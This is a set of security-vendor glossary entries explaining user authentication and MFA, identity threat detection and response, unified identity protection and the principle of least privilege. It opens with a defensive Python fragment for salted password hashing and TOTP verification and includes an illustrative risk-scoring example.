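    salt = os.urandom(16)
    pw_hash = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    totp_secret = secrets.token_bytes(20)
    USER_STORE[username] = {
        "salt": salt,
        "hash": pw_hash,
        "totp_secret": totp_secret,
        "last_counter": -1,   # highest time step already used, for replay protection
    }
    return base64.b32encode(totp_secret).decode()


def verify_password(username: str, password: str) -> bool:
    """Step 3a: recompute the hash with the stored salt and compare in constant time."""
    user = USER_STORE.get(username)
    if user is None:
        # Spend the same work for unknown users so timing does not reveal valid usernames.
        hashlib.pbkdf2_hmac("sha256", password.encode(), b"\0" * 16, PBKDF2_ITERATIONS)
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), user["salt"], PBKDF2_ITERATIONS)
    return hmac.compare_digest(candidate, user["hash"])


def verify_totp(username: str, code: str, at=None, window: int = 1) -> bool:
    """Step 3b: accept a code for the current step or +/- `window` steps, each step only once."""
    user = USER_STORE.get(username)
    if user is None:
        return False
    now = time.time() if at is None else at
    base = int(now // TOTP_STEP)
    for counter in range(base - window, base + window + 1):
        if counter <= user["last_counter"]:
            continue  # a code for this step was already consumed: reject replays
        if hmac.compare_digest(hotp(user["totp_secret"], counter), code):
            user["last_counter"] = counter
            return True
    return False


def authenticate(username: str, password: str, code: str, at=None) -> bool:
    """Steps 2 and 3 combined: the presented password and the app code must both verify."""
    return verify_password(username, password) and verify_totp(username, code, at)
```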
### The Importance of Strong User Authentication

User authentication is one of the most important aspects of cybersecurity. Strong user authentication helps prevent unauthorized access to systems, applications, and data. There are several methods of user authentication, including:

- Knowledge factors like passwords: Passwords are commonly used but can be guessed or cracked. Long, complex, unique passwords or passphrases are more secure.
- Ownership factors like security keys: Physical security keys that connect to devices provide strong two-factor authentication. They are difficult for attackers to replicate (this is also called token-based authentication).
- Certification factors like digital certificates: Certificate-based authentication relies on digital certificates, electronic documents akin to passports or driver's licenses, to authenticate users. These certificates hold the user's digital identity and are signed by a certification authority or contain a public key.
- Biometric factors like fingerprints or facial recognition: Biometrics provide convenient authentication, but biometric data can be stolen. They should not be used alone.
- Behavioral factors like typing cadence: Analyzing how a user types or interacts with a device can provide passive authentication but may be spoofed by sophisticated attackers.

User authentication protects organizations by reducing account takeover attacks, preventing unauthorized access, and limiting access to sensitive data and systems to legitimate users only. Strong MFA should be enabled wherever possible, especially for administrators, to help reduce the risk of data breaches and cyber threats. Frequent review and updating of authentication policies and methods is also important to account for evolving risks and technologies.

User authentication is a vital safeguard for any organization that stores or transmits sensitive data.
Implementing robust controls with strong MFA helps ensure that only authorized individuals can access accounts and systems. Strong user authentication, combined with good cyber hygiene like complex, unique passwords, is key to improving cybersecurity.

### Authentication Factors

There are three types of user authentication factors used to verify a user's identity:

- Something you know, like a password or PIN. Passwords are the most common authentication method. Users provide a secret word or phrase to gain access to an account or system. However, passwords can be stolen, guessed, or hacked, so on their own they do not provide strong authentication.
- Something you have, such as a security token or smart card. These physical devices generate one-time passwords or codes to authenticate users. Since the device is needed along with a password or PIN, this provides two-factor authentication and stronger security than passwords alone. However, the devices can be lost, stolen, or duplicated.
- Something you are, such as fingerprints, voice, or retina scans. Biometric authentication uses unique biological characteristics to identify individuals. Fingerprint scans, facial recognition, and retina scans are popular biometric methods. They are very difficult to spoof and provide strong authentication. However, biometric data can still be stolen in some cases, and once compromised, you cannot change your fingerprints or retinas.

To achieve the strongest authentication, organizations use multi-factor authentication (MFA), which combines two or more independent authentication factors. For example, accessing a system may require both a password (something you know) and a security token (something you have). This helps ensure that only authorized users can access accounts and prevents unauthorized access. MFA and biometric authentication methods provide the strongest protections for user accounts and systems.
As cyber threats become more advanced, single-factor password authentication is no longer sufficient. Robust MFA and biometric solutions help organizations reduce risks, enable compliance, and build user trust.

### Single-Factor Authentication

Single-factor authentication is the simplest method of user authentication. It relies on just one piece of evidence, such as a password, to verify a user's identity. While simple to implement, single-factor authentication is not very secure, since the factor (e.g. a password) can potentially be stolen, hacked or guessed.

Passwords are the most common single factor. Users provide a secret word or phrase to gain access to an account or system. However, passwords have many vulnerabilities and are prone to being cracked, stolen or guessed. Password complexity requirements aim to make passwords harder to compromise but inconvenience users and lead to poor security practices like reusing the same password across accounts.

Security questions are another single factor, where users provide personal information like their mother's maiden name or city of birth. Unfortunately, this information may be obtainable by malicious actors via social engineering or data breaches. Static information also provides a false sense of security, since the data does not actually authenticate the user.

SMS text message authentication, also known as one-time passwords or OTPs, involves sending a numeric code to a user's phone, which they must then enter to log in. While more secure than static passwords, SMS-based authentication is still vulnerable to SIM swapping, where an attacker transfers the victim's phone number to a new SIM card they control. Phone numbers can also be spoofed using VoIP services.

Single-factor authentication methods are better than no authentication but do not provide robust protection for user accounts and sensitive data.
Stronger authentication schemes like two-factor authentication and multi-factor authentication should be used whenever possible to verify users and reduce account compromise.

### Two-Factor Authentication (2FA)

Two-factor authentication (2FA) is an extra layer of security for online accounts. It requires not only your password but also another piece of information, like a security code sent to your phone. With 2FA enabled, after you enter your password, you'll be asked to provide another authentication factor like:

- A security code sent via text message or mobile app
- A code generated by an authentication app like Google Authenticator or Authy
- A physical security key

The two factors usually are:

- Something you know (like your password)
- Something you have (like your phone or a security key)

Requiring multiple factors makes it much harder for attackers to access your accounts. Even if they steal your password, they would still need your phone or security key to log in.

2FA is available for many online services like email, social media, cloud storage, and more. Though not perfect, enabling 2FA wherever it's offered adds an important safeguard for your accounts. Using a password manager to generate and remember complex, unique passwords for all your accounts and enabling 2FA are two of the best ways individuals can improve their cybersecurity.

While some users find 2FA inconvenient, the added security is worth the small hassle for most. And options like authentication apps and security keys minimize the interruption to your workflow.

With threats like phishing and data breaches on the rise, 2FA has become an essential tool for protecting online identities and accounts. Enabling multi-factor authentication, especially on important accounts like email, banking, and social media, is one of the most impactful steps everyone should take to strengthen their cybersecurity defenses.
Together with strong, unique passwords, 2FA makes you an unattractive target and helps ensure your accounts stay out of the hands of malicious actors.

### Multi-Factor Authentication (MFA)

Multi-factor authentication (MFA) is an authentication method in which a user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism. MFA adds an extra layer of security for user sign-ins and transactions. Some common examples of MFA combine two or more of:

- SMS or voice call to a mobile phone - After entering your username and password, you get a code via SMS or phone call to enter.
- Authentication app like Google Authenticator or Duo - An app on your phone generates a rotating code to enter after your password.
- Security key or token - A physical USB or Bluetooth device provides an additional code or authentication method.
- Biometrics - Technologies like fingerprint, face, or iris scanning are used along with a password.

#### Benefits of MFA

MFA provides an extra layer of protection for user accounts and helps prevent unauthorized access. Even if a hacker gets hold of your password, they would still need the second authentication factor, like your phone or security key, to log in. MFA can help reduce the risk of phishing attacks, account takeovers, and more. For organizations, MFA also helps meet compliance requirements for data security and privacy.

MFA should be enabled whenever possible for all user accounts to help improve security and reduce the risks of compromised credentials. While MFA does add an extra step to the login process, the additional security and protection for accounts make it worth the effort.

#### How MFA Works

Multi-factor authentication (MFA) adds an extra layer of security for user logins and transactions. It requires not only a password and username but also another piece of information, like a security code sent to the user's mobile device.
MFA helps prevent unauthorized access to accounts and systems by requiring two or more methods (also referred to as factors) to verify a user's identity. The three main types of authentication factors are:

- Something you know (like a password or PIN)
- Something you have (such as a security token or mobile phone)
- Something you are (such as a fingerprint or face scan)

MFA uses a minimum of two of these factors, so if one factor is compromised or stolen, unauthorized access is still prevented. When a user attempts to log in to a system or account, the first factor (typically a password) is entered. Then a second authentication factor is requested, like a code sent to the user's mobile phone via text message or an app like Google Authenticator. The user...

---

- Published: 2023-12-11
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/identity-threat-detection-and-response/

A security approach that monitors and analyzes identity-related activities to detect credential theft, privileged misuse, or lateral movement, triggering automated and manual responses to contain threats.

Identity Threat Detection and Response (ITDR) refers to the processes and technologies focused on identifying and mitigating identity-related risks, including credential theft, privilege escalation and, most importantly, lateral movement. ITDR encompasses monitoring for signs of identity compromise, investigating suspicious activity, and taking automated and manual mitigation actions to contain threats.

ITDR employs various methods to analyze authentication traffic and detect potential identity-based threats. Prominent methods are the use of machine learning to detect access anomalies, monitoring for suspicious authentication sequences, and analyzing authentication packets to disclose TTPs such as Pass-the-Hash, Kerberoasting and others.
It is paramount that an ITDR solution use all these methods together to increase accuracy and avoid the false positives that arise from flagging a user accessing a new machine as an anomaly that triggers an alert.

ITDR solutions take action through automated responses, like requiring multi-factor authentication to verify that a detected anomaly is indeed malicious and blocking access for accounts that are determined to be compromised. They also generate alerts for security analysts to investigate and remediate. Analysts may reset account passwords, unlock accounts, review privileged account access, and check for signs of data exfiltration.

Effective ITDR requires aggregation of identity signals across an organization's identity infrastructure. This includes on-prem and cloud directories, as well as any component within the environment that manages user authentications (such as Active Directory). Ideally, these signals should be processed and analyzed in real time as the access attempt is initiated, but some ITDR solutions analyze their logs retroactively. The more data ITDR solutions can analyze, the more accurately they can detect sophisticated threats. However, they must also ensure privacy, data security, and compliance with regulations like GDPR.

ITDR is a critical component of a strong cybersecurity architecture. ITDR helps organizations establish robust resilience against lateral movement, account takeover, and ransomware spread, eliminating a critical portion of today's enterprise cyber risks.

### Why Is ITDR Important?

There are several reasons why ITDR has become such a crucial component of cybersecurity:

- Identities are the new perimeter. As companies move to cloud and hybrid environments, the traditional network perimeter has dissolved. User and device identities are the new perimeter, and they must be protected. Moreover, user identities are a historic blind spot that threat actors increasingly abuse when attacking the on-prem environment.
- Credentials are the easiest security measure to compromise. Phishing and social engineering are prevalent. Phishing emails and social engineering tactics are commonly used to steal user credentials and access systems. ITDR solutions analyze user behavior to detect credential theft and suspicious activity.
- Compliance requirements demand it. Regulations like GDPR, HIPAA, and PCI DSS mandate that companies protect personal data and monitor for identity compromise events and data breaches. ITDR solutions address these compliance requirements.
- Attackers target accounts and credentials. Stolen usernames, passwords, and compromised accounts are frequently used to infiltrate networks and systems. ITDR detects when accounts and credentials have been stolen or misused, enabling a quick response.

### How ITDR Works

When an ITDR system detects suspicious activity, it triggers an automated response to contain the threat before sensitive data can be accessed or stolen. Common responses include:

- Generating an alert on suspicious activity
- Requiring multi-factor authentication for account access
- Blocking access from unrecognized devices or locations

Effective ITDR requires aggregating and analyzing identity and account data from across an organization. This includes:

#### User Access Data

Details about which accounts have access to which systems and resources. Monitoring for unusual access patterns can reveal account takeovers or privilege escalation attacks.

#### Behavioral Profiles

Historical patterns of user login times, locations, devices used and other behaviors. Deviations from established profiles may indicate an account compromise.

#### Threat Intelligence

Information about active cyber threats, attack techniques and indicators of compromise. ITDR solutions can match behavioral anomalies and suspicious events against known threats to identify targeted attacks.

#### Relationship Mapping

Connections between users, accounts and systems.
Detecting lateral movement between unrelated accounts or resources may uncover an active intrusion.

By continuously monitoring this data and acting quickly when threats are detected, ITDR helps reduce the risk of identity-based breaches that could expose sensitive customer data, intellectual property or other critical digital assets. With cybercriminals increasingly focused on identity as an attack vector, ITDR has become an important component of cyber defense in depth for many organizations.

### The Core Components of an ITDR Solution

An effective ITDR solution relies on four core components working together:

#### Continuous Monitoring

Continuous monitoring constantly scrutinizes networks, systems, and user accounts for anomalies that could indicate identity threats. It helps detect threats early through ongoing analysis of logs, events, and other data. Continuous monitoring solutions use machine learning and behavioral analytics to establish a baseline of normal activity and spot deviations that could signal an attack targeting identity systems.

#### Identity Governance

Identity governance aims to manage digital identities and access privileges. It ensures that user access is appropriate and compliant with security policies. Identity governance solutions automate user provisioning and deprovisioning, enforce access policies, and monitor for policy violations. They provide a centralized way to control access across an organization's systems and applications.

#### Threat Intelligence

Threat intelligence informs an organization about the motives, methods, and tools of threat actors targeting networks and accounts. ITDR solutions incorporate threat intelligence to help security teams anticipate new types of identity attacks. Armed with knowledge about emerging threats, organizations can better detect and respond to sophisticated identity compromises.

#### Incident Response

When identity threats are detected, an automated incident response capability can help minimize damage.
ITDR solutions trigger pre-defined response actions like disabling compromised accounts, isolating impacted systems, or resetting passwords. They also alert security teams about the incident and provide information to aid in further investigation and remediation.

An ITDR solution with all four of these components helps organizations take a proactive stance against identity threats through ongoing monitoring and governance, gain insight into emerging attack techniques from threat intelligence, and respond quickly when incidents do occur. With comprehensive visibility and control across digital identities and access, organizations can reduce risks to accounts, networks, systems, applications, and data.

### Implementing ITDR in Your Organization

Implementing an ITDR solution requires strategic planning and execution. To successfully deploy ITDR in an organization, several key steps should be followed:

First, assess the organization's security vulnerabilities and risks. This includes identifying critical systems, applications, and data assets that require monitoring and protection. It also involves evaluating existing security controls and procedures to determine any gaps that could be addressed by an ITDR solution.

Next, determine ITDR requirements and scope. The organization needs to decide which threats and risks the solution should address, such as unauthorized access, data breaches, account takeover, etc. It also must determine which systems, applications, and accounts will be monitored by the ITDR solution.

With requirements defined, the organization can evaluate ITDR solutions from different vendors that meet its needs. It should assess factors like the types of identity threats detected, ease of deployment and use, integration with existing security tools, and cost. After comparing options, it chooses the solution that best fits its requirements.
The selected ITDR solution is then deployed, configured, and integrated with the organization's infrastructure and security stack. User access and permissions are set up, policies around alerting and response are established, and administrators are properly trained to operate the solution.

After deployment, the ITDR solution must be continuously monitored to ensure it is functioning properly and providing maximum value. Policies and configurations should be tuned over time based on lessons learned. The solution itself may also need upgrading to address new identity threats. Ongoing education and practice help build the team's skills in detecting and responding to identity threats.

With vigilant management and the right solution in place, an organization can strengthen its security posture against damaging identity threats. ITDR, when implemented well, gives companies a robust mechanism for discovering and mitigating identity compromises before they cause harm.

### Best Practices for ITDR

Best practices for ITDR include identifying key vulnerabilities, monitoring for threats, and having a response plan in place.

To identify identity security gaps, organizations should conduct regular risk assessments and penetration testing. Risk assessments evaluate infrastructure, applications, and user access controls to find weaknesses that could be leveraged for attack. Penetration testing simulates real-world attacks to uncover vulnerabilities. Identifying vulnerabilities is an ongoing process as new threats emerge and environments change.

Continuous monitoring is also critical. This includes monitoring user accounts for anomalous login activity, watching network traffic for signs of brute force attacks or data exfiltration, and analyzing logs to detect compromises after the fact. Security teams should establish key risk indicators and monitor them regularly.

Having an incident response plan prepares organizations to act quickly in the event of a compromise.
The plan should designate key roles and responsibilities, communication protocols, and procedures for containing threats and restoring systems. Plans need to be tested through simulations to ensure effectiveness. Teams should also have access to threat intelligence to stay up to date on adversary tactics, techniques, and procedures.

Other best practices include:

- Multi-factor authentication to verify user identities
- Least-privilege access policies to limit user permissions
- Regular phishing simulations and security awareness training for employees
- Centralized logging and security information and event management (SIEM) to correlate data
- Backup and recovery strategies in case of ransomware or other destructive attacks
- Assume identities are an attack surface

Following these best practices helps organizations take a proactive stance on security. Detecting threats early and having a tested plan for response can help minimize damage from attacks and reduce recovery time. Continuous improvement is key to staying ahead of sophisticated adversaries. With technology and techniques constantly evolving, ITDR must be an ongoing priority.

### Key ITDR Challenges and How to Overcome Them

ITDR solutions face several key challenges that organizations must overcome to be effective.

#### Identities are not treated as an attack surface

The identity attack surface is the least protected in the IT environment today because, unlike malware, exploits or phishing attacks, malicious access with compromised credentials is identical to legitimate access, making it extremely hard to identify and block.

#### Lack of visibility

ITDR tools rely on data to detect threats, but many organizations lack visibility into user and entity behavior. Without access to authentication logs, network activity, and other data sources, ITDR solutions have limited ability to spot anomalies. Organizations must implement comprehensive logging and monitoring to provide the data ITDR needs.
#### Too many false positives

ITDR systems that generate too many false positives overwhelm security teams and reduce trust in the system. Organizations must tune ITDR systems to their environment by customizing detection rules, configuring thresholds for alerts, and filtering out known false positives. They can also use machine learning to help the system adapt to their network's normal behavior. Strong ITDR solutions incorporate MFA as an additional verification layer prior to alerting or blocking access. This is the most effective method to filter noise and ensure that only actual threats trigger a response.

#### Lack of context

ITDR alerts provide information about a suspicious event but often lack context around the event. Organizations need to gather additional context, such as details about the user, device, and network involved, as well as activity leading up to and following the suspicious event. Context helps analysts determine whether an alert is a true positive.

#### Skill and resource shortage

Effective ITDR requires skilled security analysts to review, investigate and respond to alerts. However, the cybersecurity skills shortage means many organizations lack enough analysts. Organizations should consider outsourcing ITDR to a managed security services provider or using security orchestration, automation and response (SOAR) tools to help streamline the review and response process.

#### Poor response planning

Even with effective detection, organizations must have a well-defined response plan to properly react to and contain threats. Organizations need to determine responses for different types of threats, create runbooks for common scenarios, assign roles and responsibilities, and establish metrics to measure response effectiveness. Planning and practice can help organizations minimize the damage from identity threats.

### The Future of ITDR: What's Next?

The field of ITDR is constantly...
---
- Published: 2023-12-11
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/unified-identity-protection/

A consolidated security approach that provides centralized visibility and automated safeguards across all identity types—human and machine—to detect and respond to threats universally.

Unified Identity Protection refers to a holistic approach that provides comprehensive safeguards for an organization's digital identities and access. Unified Identity Protection Platforms consolidate identity and access management, multi-factor authentication, privileged access management, and more, into a single cohesive solution that addresses the wide range of identity threats. By coordinating these functions, it aims to eliminate security gaps, reduce risks, and streamline operations. For cybersecurity professionals, understanding Unified Identity Protection and how to implement it effectively has become essential knowledge.

### Unified Identity Protection: An Overview

Unified Identity Protection provides centralized visibility and control over all user and service account access across an organization's entire IT environment. It integrates with the identity and access management controls for on-premise and cloud-based corporate resources to provide an infrastructure-agnostic security layer.

Unified Identity Protection solutions offer a holistic approach to managing identities and access. They provide continuous monitoring of user and service account activity across all connected systems. Advanced analytics powered by machine learning detect anomalous behavior and risk in real time. Adaptive authentication and access policies are then enforced based on the level of risk.

#### Comprehensive Coverage

Unified Identity Protection solutions integrate with all major identity and access management systems as well as infrastructure, cloud services, and business applications. This provides coverage for all connected assets across on-premise, hybrid, and cloud environments. Resources that were previously unprotected, such as legacy systems, file storage, and command-line tools, are now secured.

#### Centralized Visibility and Control

A unified platform gives IT teams a centralized view of all access and activity across the organization. Comprehensive reports provide insights into risk exposure, compliance gaps, and opportunities for streamlining access. Granular controls allow administrators to manage access, enable single sign-on, and enforce multi-factor authentication based on conditional factors like user role, access method, and risk level.

#### Advanced Threat Protection

Powerful analytics, machine learning, and behavioral profiling work together to detect anomalous access, credential sharing, privilege escalation, and insider threats. Adaptive responses ranging from step-up authentication to blocking access are automatically triggered based on the risk severity. This protects critical resources from compromise and data breaches.

### How Unified Identity Protection Works

Unified Identity Protection (UIP) provides continuous monitoring and adaptive control of user access across an organization's hybrid IT environment. UIP solutions integrate with existing identity and access management (IAM) systems to gain a comprehensive view of accounts, entitlements, and access events.

UIP leverages machine learning and behavioral analytics to detect anomalous access patterns in real time. Risk-based policies are then applied to step up authentication or block suspicious access attempts. For example, if a user account suddenly accesses a high-value resource it has never accessed before, UIP can require additional verification like multi-factor authentication (MFA) before granting access.

#### How UIP Works

UIP solutions typically comprise three main components:

- Connectors that integrate with on-prem and hybrid IAM systems, PAM, VPN, and any other component that processes credentials for user access, to gain visibility into accounts, authentication events, and resource access. These provide continuous unified monitoring of all authentication requests that spans both user-to-machine and machine-to-machine access across all resources and environments. This includes attempts to access cloud workloads, SaaS applications, on-premises servers and workstations, local business applications, file shares and any other resource.
- A risk engine that uses machine learning and behavioral profiling to detect anomalies and calculate a risk score for each access request. The risk engine considers factors like time of day, location, device, resource sensitivity, and more, to provide real-time risk analysis of each and every authentication attempt to detect and respond to threats. Analyzing the full context of an authentication request requires visibility into the behavior on all networks, clouds or on-prem resources.
- An active enforcement layer that takes action based on risk score and/or configured policy rules. Actions may include prompting for additional authentication factors, notifying administrators, restricting access, blocking the request altogether, or the enforcement of adaptive authentication and access policies on all access attempts. This involves extending security controls like MFA, risk-based authentication and conditional access to all enterprise resources.

UIP provides a consolidated view of risk across an organization's hybrid IT environment. With comprehensive visibility and unified controls in place, businesses can reduce the risk of data breaches, streamline compliance processes, and enable a seamless transition to cloud-based infrastructure. UIP delivers a proactive approach to identity and access security in today's enterprise.
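The three-component pipeline just described (connectors normalizing authentication events, a risk engine scoring them on time of day, location, device and resource sensitivity, an enforcement layer mapping the score to allow / step-up MFA / block) as an added, self-contained illustration. This is example code written for this page, not Silverfort's product code; the per-user baselines, the scoring weights, the thresholds and the sample event feed are all constructed assumptions, and the connector labels (`ad`, `vpn`, `saas`) are placeholders.

```python
"""Toy Unified Identity Protection pipeline: connector events -> risk engine ->
enforcement decision.  Added illustration only, not Silverfort's code; the
scoring weights, thresholds, baselines and sample events are constructed."""
from dataclasses import dataclass, field


@dataclass
class AuthEvent:
    """One authentication request as a connector would normalize it."""
    source: str      # connector that saw it: "ad", "vpn", "saas" (constructed labels)
    user: str
    device: str
    location: str
    hour: int        # local hour of day, 0-23
    resource: str


@dataclass
class Baseline:
    """What the risk engine has learned as 'normal' for one identity."""
    devices: set
    locations: set
    work_hours: range = field(default_factory=lambda: range(7, 20))


# Constructed baselines: a human user and a machine-to-machine service account.
BASELINES = {
    "alice": Baseline({"LAPTOP-A1"}, {"Berlin"}),
    "svc-backup": Baseline({"SRV-BK01"}, {"DC-Frankfurt"}, range(0, 24)),
}

# Resource sensitivity weights (constructed); unknown resources get the default.
RESOURCE_SENSITIVITY = {"domain-controller": 35, "hr-fileshare": 25, "wiki": 5}
DEFAULT_SENSITIVITY = 10

# Policy thresholds the enforcement layer applies (constructed).
STEP_UP_THRESHOLD = 40   # at or above: require an additional factor (MFA)
BLOCK_THRESHOLD = 70     # at or above: deny the request outright


def risk_score(ev: AuthEvent) -> int:
    """Combine device, location, time of day and resource sensitivity into 0-100."""
    base = BASELINES.get(ev.user)
    score = 0
    if base is None:
        score += 40                      # identity with no history at all
    else:
        if ev.device not in base.devices:
            score += 25
        if ev.location not in base.locations:
            score += 25
        if ev.hour not in base.work_hours:
            score += 15
    score += RESOURCE_SENSITIVITY.get(ev.resource, DEFAULT_SENSITIVITY)
    return min(score, 100)


def decide(ev: AuthEvent) -> str:
    """Enforcement layer: translate the score into allow / mfa / block."""
    score = risk_score(ev)
    if score >= BLOCK_THRESHOLD:
        return "block"
    if score >= STEP_UP_THRESHOLD:
        return "mfa"
    return "allow"


def process(events):
    """Run a batch of connector events through the pipeline."""
    return [(ev.source, ev.user, ev.resource, risk_score(ev), decide(ev))
            for ev in events]


# Constructed sample feed spanning user-to-machine and machine-to-machine access.
SAMPLE_EVENTS = [
    AuthEvent("ad", "alice", "LAPTOP-A1", "Berlin", 10, "wiki"),
    AuthEvent("vpn", "alice", "UNKNOWN-PC", "Berlin", 10, "hr-fileshare"),
    AuthEvent("ad", "alice", "UNKNOWN-PC", "Lagos", 3, "domain-controller"),
    AuthEvent("ad", "svc-backup", "SRV-BK01", "DC-Frankfurt", 2, "domain-controller"),
    AuthEvent("saas", "mallory", "TABLET-9", "Lagos", 12, "wiki"),
]

if __name__ == "__main__":
    for row in process(SAMPLE_EVENTS):
        print(row)
```

Two design points worth noting: the service account's 02:00 access to the domain controller scores low because its baseline covers all hours, which is why per-identity baselines rather than one global rule matter; and an identity with no baseline at all lands in the step-up band rather than being allowed, so a never-seen account cannot slip through on a low-sensitivity resource.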
### Key Capabilities of Unified Identity Protection Platforms

A Unified Identity Protection Platform offers several key capabilities:

#### Centralized Management

Unified identity protection solutions provide a single management console to configure and monitor identity protection policies across an organization. This centralized approach reduces administrative overhead and ensures consistent policy enforcement across on-premises and cloud environments.

#### Risk-Based Authentication

Unified identity protection solutions implement risk-based authentication, which evaluates the risk level of a login attempt and applies adaptive authentication controls accordingly. For example, if a login is detected from an unknown device or location, the solution may prompt for additional authentication factors like one-time passwords. This helps prevent unauthorized access while minimizing friction for legitimate users.

#### Anomaly Detection

Unified identity protection solutions use machine learning to establish a baseline of normal user behavior and detect anomalous activity that could indicate account compromise or insider threats. Solutions monitor attributes like login locations, devices, and timings, as well as activity within applications, to spot unusual behavior. When anomalous activity is detected, the solution can trigger risk-based authentication or block access.

#### User and Entity Behavior Analytics

Unified identity protection solutions provide user and entity behavior analytics, which apply machine learning to detect complex behavioral patterns across large volumes of identity data that may indicate threats. Solutions can detect threats like stolen credential usage, privilege escalation, and data exfiltration that would otherwise go unnoticed. Analytics results are presented with contextual information to help security analysts investigate and respond to potential threats.

In summary, unified identity protection solutions deliver a robust set of capabilities including centralized management, risk-based authentication, anomaly detection, and advanced user behavior analytics. These capabilities work together to provide comprehensive protection for identities and sensitive resources across IT environments.

### Why Unified Identity Protection Matters

Unified Identity Protection is essential for organizations today. As companies adopt cloud services and remote work becomes more common, traditional perimeter security is no longer sufficient. Unified Identity Protection provides continuous authentication and access control across all corporate resources, regardless of location.

#### Comprehensive Coverage

Unified Identity Protection monitors all access by users and service accounts across cloud and on-premise environments. It analyzes access of privileged accounts, endpoints, applications, networks, and files to provide a single pane of glass into identity and access activity. This consolidated view allows security teams to gain visibility into risks that span the entire IT infrastructure.

#### Real-Time Analytics

Unified Identity Protection uses machine learning and behavioral analysis to detect anomalies in real time. The solution analyzes vast amounts of data to establish a baseline of normal activity for each user and resource. It then flags unusual access attempts, excessive permissions, and other potential threats. Security teams receive alerts about risky events as they happen, enabling rapid response.

#### Proactive Control

Based on analytics, Unified Identity Protection enforces adaptive authentication and granular access policies. It may require step-up authentication for risky access, or it could block access altogether. Policies are tailored to the sensitivity of resources and the risk profile of users. Controls also evolve as the solution learns more about typical behavior patterns in the organization.

#### Simplified Compliance

Unified Identity Protection generates comprehensive reports to demonstrate compliance with regulations like PCI DSS, HIPAA, GDPR, and others. The solution provides an audit trail of all access activity, permissions, and policy enforcements across the IT environment. This level of visibility and control helps organizations comply with identity and access management requirements and pass audits with less effort.

In summary, Unified Identity Protection delivers defense in depth for identities and access. It is a must-have capability for securing corporate resources and sensitive data in today's expanding threat landscape. By consolidating identity security controls across on-premise and cloud infrastructure, Unified Identity Protection enables a cohesive, data-driven approach to access governance and risk mitigation.

### The Future of Unified Identity Protection

Unified Identity Protection platforms are evolving rapidly to keep up with the increasing sophistication of cyber threats. As more organizations adopt cloud services and enable remote workforces, the need for comprehensive yet streamlined security is paramount.

#### Expanding Coverage

UIP solutions will continue expanding their coverage to more assets and access types. They will integrate with more IAM, infrastructure, and cloud platforms to provide end-to-end visibility and control across increasingly complex IT ecosystems. UIP systems will monitor access to emerging technologies like serverless functions, Kubernetes, and microservices. They will also track the proliferating types of identities, including service accounts, machine identities, and ephemeral access keys.

#### Applying Advanced Analytics

Artificial intelligence and machine learning will enable UIP platforms to become smarter and more responsive. They will detect anomalies, spot suspicious behavior patterns, and identify risky access in real time. Analytics will power adaptive policies that adjust automatically based on context like user attributes, resource sensitivity, and threat levels. Risk-based authentication will leverage biometrics, behavior profiling, and risk signals to apply the appropriate authentication method for each access request.

#### Orchestrating Integrated Workflows

UIP solutions will integrate more tightly with other security tools like SIEMs, firewalls, and XDRs. They will participate in coordinated incident response workflows by sharing identity context and access data. UIP platforms will also trigger automated responses by interfacing with tools like identity governance, privileged access management, and network security. These integrated, automated workflows will accelerate detection, investigation, and remediation of threats involving compromised or misused identities.

The future of Unified Identity Protection is one of expanded scope, enhanced intelligence, and integrated functionality. UIP solutions that can provide comprehensive, risk-aware coverage, tap advanced analytics, and orchestrate with other security controls will be best positioned to help organizations navigate the challenges of the hybrid cloud era. By consolidating identity security, UIP reduces complexity while improving protection, compliance, and operational efficiency.

### Conclusion

It's clear that Unified Identity Protection offers a comprehensive solution to securing user identities across an organization. By taking a holistic approach instead of relying on disparate identity and access management solutions, organizations can gain better visibility and control. They can also reduce risk by eliminating identity silos and ensuring consistent policy enforcement. With the rise of cloud services, mobility, and digital transformation, identity has become the new security perimeter. Unified Identity Protection helps ensure that perimeter is properly defended through an integrated system that provides a single source of truth for user identities. For cybersecurity leaders looking to strengthen their identity and access management posture, Unified Identity Protection deserves strong consideration.

---
- Published: 2023-11-30
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/principle-of-least-privilege/

A security principle where users and systems are granted only the minimal access levels necessary to perform their functions, limiting potential misuse or compromise.

The principle of least privilege is based on restricting user access to only the resources and permissions necessary to fulfill their responsibilities. Users are only granted the minimum access rights and permissions required to complete their work and nothing more. By restricting unnecessary access, the principle of least privilege (also called the principle of minimal privilege) helps reduce an organization's attack surface. With fewer access points and privileges available to potential threat actors, the likelihood of a successful cyberattack decreases. Following this principle also limits the possible damage from an attack by restricting what resources can be accessed.

### Why Is Least Privilege Important for Cybersecurity?

Following the principle of least privilege (POLP) enhances security by reducing the number of potential attack vectors. When users have excessive permissions, their accounts become more valuable targets for threat actors seeking to infiltrate and gain access to systems and critical resources. By limiting user privileges to only what is required for their role, organizations decrease the likelihood of compromise and limit potential damage. If a user account with unnecessary admin access is compromised, the attacker would gain those admin rights and could access sensitive data, install malware, and make major system changes.
By applying least privilege, admin accounts are only provided to select individuals, and standard user accounts have limited permissions, reducing the impact of privileged account takeovers. Overall, the principle of least privilege supports the "need to know" model, where users only have access to the minimum amount of data and resources required to do their jobs. This approach strengthens security and compliance for any organization.

### How the Principle of Least Privilege Works

To implement the least privilege principle, system administrators carefully control access to resources and limit users' permissions. Some examples include:

- Restricting user access to specific systems, files, folders, and storage areas. Users can only access the files and folders needed for their role.
- Assigning limited user permissions and access rights to applications, databases, critical systems, and APIs. Users are only granted the minimum permissions required to fulfill their responsibilities.
- Provisioning role-based access control (RBAC) to limit users to specific job functions. RBAC assigns users to roles based on their responsibilities and grants permissions based on those roles.
- Regularly reviewing and auditing user access rights to ensure they are still appropriate and making changes as needed. Permissions that are no longer required are promptly revoked, thus avoiding identity sprawl and privilege creep.
- Enforcing the separation of duties by dividing complex tasks among multiple users. No single user has end-to-end control or the permissions to abuse the process.

By following the principle of least privilege, organizations can limit the potential damage from insider threats, account takeovers, and compromised privileged credentials. It also promotes accountability by making it clear which users have access to what resources. Overall, the principle of least privilege is a foundational best practice for cybersecurity risk management.

### Least Privilege & Zero Trust

